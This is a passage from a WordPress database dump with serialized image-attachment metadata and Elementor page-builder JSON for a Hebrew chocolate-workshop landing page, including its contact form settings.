{s:4:\"file\";s:13:\"6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36,15,'_elementor_source_image_hash','bbd6eca6d18fd7d683b1d67189ab85bb9c8ec42d'),(37,16,'_wp_attached_file','2018/05/xobyibymx20-elli-o.png'),(38,16,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:250;s:4:\"file\";s:30:\"2018/05/xobyibymx20-elli-o.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"xobyibymx20-elli-o-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"xobyibymx20-elli-o-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:30:\"xobyibymx20-elli-o-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39,16,'_elementor_source_image_hash','41ff19d7f11cf404d530cee5562f614bdbf34c2f'),(40,17,'_wp_attached_file','2018/05/https-visualhunt.comphoto61107-copy.png'),(41,17,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:250;s:4:\"file\";s:47:\"2018/05/https-visualhunt.comphoto61107-copy.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"https-visualhunt.comphoto61107-copy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"https-visualhunt.comphoto61107-copy-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:47:\"https-visualhunt.comphoto61107-copy-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(42,17,'_elementor_source_image_hash','be152a755419f4509b35a723a90cb7bdacd7e1aa'),(43,18,'_wp_attached_file','2018/05/https-images.unsplash.comphoto-1468071174046-657d9d351a40ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbsdc3e2483b80b4240305faedd4952a932.png'),(44,18,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:250;s:4:\"file\";s:144:\"2018/05/https-images.unsplash.comphoto-1468071174046-657d9d351a40ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbsdc3e2483b80b4240305faedd4952a932.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:144:\"https-images.unsplash.comphoto-1468071174046-657d9d351a40ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbsdc3e2483b80b4240305faedd4952a932-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:144:\"https-images.unsplash.comphoto-1468071174046-657d9d351a40ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbsdc3e2483b80b4240305faedd4952a932-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:144:\"https-images.unsplash.comphoto-1468071174046-657d9d351a40ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbsdc3e2483b80b4240305faedd4952a932-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(45,18,'_elementor_source_image_hash','e82d85d3e3e211adc1748006bf08efea01adfbb2'),(46,19,'_wp_attached_file','2018/05/toa-heftiba-166015.png'),(47,19,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:250;s:4:\"file\";s:30:\"2018/05/toa-heftiba-166015.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"toa-heftiba-166015-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"toa-heftiba-166015-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:30:\"toa-heftiba-166015-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(48,19,'_elementor_source_image_hash','a7a5e8e7868006302ca3ab12cea8f48ff8761a2f'),(49,20,'_wp_attached_file','2018/05/https-images.unsplash.comphoto-1455853739633-8c94c03d8121ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbs8f821c82a319a0dae63dd5c6678113e1.png'),(50,20,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:250;s:4:\"file\";s:144:\"2018/05/https-images.unsplash.comphoto-1455853739633-8c94c03d8121ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbs8f821c82a319a0dae63dd5c6678113e1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:144:\"https-images.unsplash.comphoto-1455853739633-8c94c03d8121ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbs8f821c82a319a0dae63dd5c6678113e1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:144:\"https-images.unsplash.comphoto-1455853739633-8c94c03d8121ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbs8f821c82a319a0dae63dd5c6678113e1-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:144:\"https-images.unsplash.comphoto-1455853739633-8c94c03d8121ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbs8f821c82a319a0dae63dd5c6678113e1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51,20,'_elementor_source_image_hash','e2979f3327f5a0b84657fdd8cbf0996a1355670d'),(52,21,'_wp_attached_file','2018/05/toa-heftiba-166010.png'),(53,21,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:250;s:4:\"file\";s:30:\"2018/05/toa-heftiba-166010.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"toa-heftiba-166010-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"toa-heftiba-166010-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:30:\"toa-heftiba-166010-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(54,21,'_elementor_source_image_hash','6c50cc42c6c5fa9946647da08aac6f6517512744'),(55,22,'_wp_attached_file','2018/05/eaters-collective-109596.png'),(56,22,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:250;s:4:\"file\";s:36:\"2018/05/eaters-collective-109596.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"eaters-collective-109596-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"eaters-collective-109596-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:36:\"eaters-collective-109596-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(57,22,'_elementor_source_image_hash','3ff210f8d143a6632ffb399bdb8aa88bba003224'),(58,23,'_wp_attached_file','2018/05/ali-inay-9858.png'),(59,23,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:121;s:6:\"height\";i:121;s:4:\"file\";s:25:\"2018/05/ali-inay-9858.png\";s:5:\"sizes\";a:1:{s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:25:\"ali-inay-9858-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(60,23,'_elementor_source_image_hash','4333aa5205ad0c3b5a82861113f5cf262c2dcb35'),(61,24,'_wp_attached_file','2018/05/michael-browning-188999.png'),(62,24,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1620;s:6:\"height\";i:507;s:4:\"file\";s:35:\"2018/05/michael-browning-188999.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"michael-browning-188999-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"michael-browning-188999-300x94.png\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"michael-browning-188999-768x240.png\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"michael-browning-188999-1024x320.png\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:35:\"michael-browning-188999-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63,24,'_elementor_source_image_hash','e1bc76897402bb9755894ee037b989693274df09'),(67,7,'_elementor_template_type','wp-post'),(70,26,'_wp_attached_file','2018/05/inner-hp.jpg'),(71,26,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:370;s:4:\"file\";s:20:\"2018/05/inner-hp.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"inner-hp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"inner-hp-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:20:\"inner-hp-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73,7,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":190,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d1\\u05e9\\u05d1\\u05d9\\u05dc\\u05db\\u05dd?\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"select\",\"field_label\":\"\\u05d0\\u05d6\\u05d5\\u05e8 \\u05d1\\u05d0\\u05e8\\u05e5?\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"5e9e233\",\"required\":\"true\",\"field_options\":\"\\u05de\\u05e8\\u05db\\u05d6\\n\\u05e6\\u05e4\\u05d5\\u05df\\n\\u05d3\\u05e8\\u05d5\\u05dd\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\",\"submit_actions\":[\"email\",\"redirect\",\"webhook\"],\"webhooks\":\"https:\\/\\/hooks.zapier.com\\/hooks\\/catch\\/2852444\\/osyxhok\\/\",\"redirect_to\":\"https:\\/\\/www.chocolate4u.co.il\\/thanks\\/\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"button_icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"webhooks_advanced_data\":\"\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans 